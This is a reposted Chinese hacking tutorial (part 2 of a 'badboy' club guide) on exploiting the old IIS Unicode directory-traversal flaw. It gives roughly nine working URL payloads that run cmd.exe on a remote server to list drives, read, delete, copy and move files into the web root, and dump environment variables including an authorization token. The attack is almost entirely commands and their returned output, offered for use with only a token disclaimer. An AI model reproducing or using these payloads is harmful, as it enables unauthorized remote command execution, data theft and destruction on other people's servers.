分享
 
 
 

UNICODE编码漏洞全攻略-2

王朝other·作者佚名  2006-01-08
窄屏简体版  字體: |||超大  

UNICODE编码漏洞全攻略-2

—————————————————————————————————

badboy 坏男孩俱乐部

这并不是什么权威教材,只适合菜鸟了解win9x、NT存在的不安全面,切莫

用此方法在国内做尝试,如果你偏要如此,那么由此引起的一切法律后果由

你自己负责。

本文只允许在网络任意转载,但须保留文章的完整性,如把本文作为经济目

的使用,或者未经本人许可进行印刷、光盘杂志、等出版性质的行为,本人

将保留侵权控告的权利。

—————————————————————————————————

三、UNICODE编码漏洞简单利用的命令

一般情况下我们用 http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

看到的目录是空的:(例如)

Directory of C:\inetpub\scripts

2000-09-28 15 〈DIR〉 .

2000-09-28 15 〈DIR〉 ..

如果我们这样输入的话: http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:

就可以看到该主机c:盘的目录和文件了。

其他的一些简单的用法:

1、显示文件内容

如果想显示里面的其中一个badboy.txt文本文件,我们可以这样输入

(htm,html,asp,bat等文件都是一样的) http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+type+c:badboy.txt

那么该文件的内容就可以通过IE显示出来。

2、建立文件夹的命令 http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+md+c:badboy

运行后我们可以看到返回这样的结果:

CGI Error

The specified CGI application misbehaved by not returning a complete

set of HTTP headers. The headers it did return are:

英文意思是

CGI错误

具体的CGI申请有误,不能返回完整的HTTP标题,返回的标题为:

3、删除空的文件夹命令: http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+rd+c:badboy

返回信息同上

4、删除文件的命令: http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del+c:badboy.txt

返回信息同上

5、copy文件且改名的命令: http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:badboy.txt bad.txt

返回信息:

CGI Error

The specified CGI application misbehaved by not returning a complete

set of HTTP headers. The headers it did return are:

1 file(s) copied.

6、显示目标主机当前的环境变量 http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+set

返回的信息:

CGI Error

The specified CGI application misbehaved by not returning a complete

set of HTTP headers. The headers it did return are:

ALLUSERSPROFILE=E:\Documents and Settings\All Users

AUTH_TYPE=Negotiate

AUTH_USER=BADBOYCL-DQQZQQ\badboy

CASL_BASEDIR_ENV=E:\scan\CyberCop Scanner\casl

CommonProgramFiles=E:\Program Files\Common Files

COMPUTERNAME=BADBOYCL-DQQZQQ

ComSpec=E:\WINNT\system32\cmd.exe

CONTENT_LENGTH=0

GATEWAY_INTERFACE=CGI/1.1

HTTP_ACCEPT=*/*

HTTP_ACCEPT_LANGUAGE=zh-cn

HTTP_CONNECTION=Keep-Alive

HTTP_HOST=127.0.0.1

HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

HTTP_AUTHORIZATION=Negotiate TlRMTVNTUAADAAAAGAAYAIgAAAAYABgAoAAAAB4AHgBAAAAADAAMAF4AAAAeAB4AagAAAAAAAAC4AAAABYKAgEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAGIAYQBkAGIAbwB5AEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAODLOAUsBqOAQ3/+AfwqHKj8Q2vzSAGGgkD6hCEY0EoOIKZVHMr4lmc1Ju37n7SleT==

HTTP_ACCEPT_ENCODING=gzip, deflate

HTTPS=off

INSTANCE_I

7、把某个文件夹内的全部文件一次性COPY到另外的文件夹去 http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+xcopy c:\badboy c:\inetpub\wwwroot

返回的信息:

CGI Error

The specified CGI application misbehaved by not returning a complete

set of HTTP headers. The headers it did return are:

我们查看c:\inetpub\wwwroot文件夹,结果所有c:\badboy内的都拷贝到该目录里了

8、把某个文件夹剪贴到指定的目录去 http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+move c:\badboy c:\inetpub\wwwroot

呵呵,还是可以做到的,时间的长短要看文件的多少了

9、显示某一路径下相同文件类型的文件内容 http://127.0.0.1/scripts/..%c1%1c..winnt/system32/find.exe?/n+/v+""+c:inetpubwwwroot*.ht*

完全显示出来呀

同样,还有很多命令可以执行,大家可以试试,不过有些时间会很久,有些

是不能执行的。

解释+号,在这里+等于空格键,当然你也可以用空格键,用空格键运行后会

转换为%20 和%c1%1c=/是同一道理的。

对于名字超过8个字母的文件夹,如果我们想看里面的内容时就有点不同了

比如说我们想看目标主机Program Files文件夹里面的内容时,应该这样输入 http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:progra~1

这里就不能用+或者%20来代替program与files间的空格。

至于对aa bb这样中间带有空格的文件夹怎么看,目前我还不知道,如果谁知道

可以写出来。

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有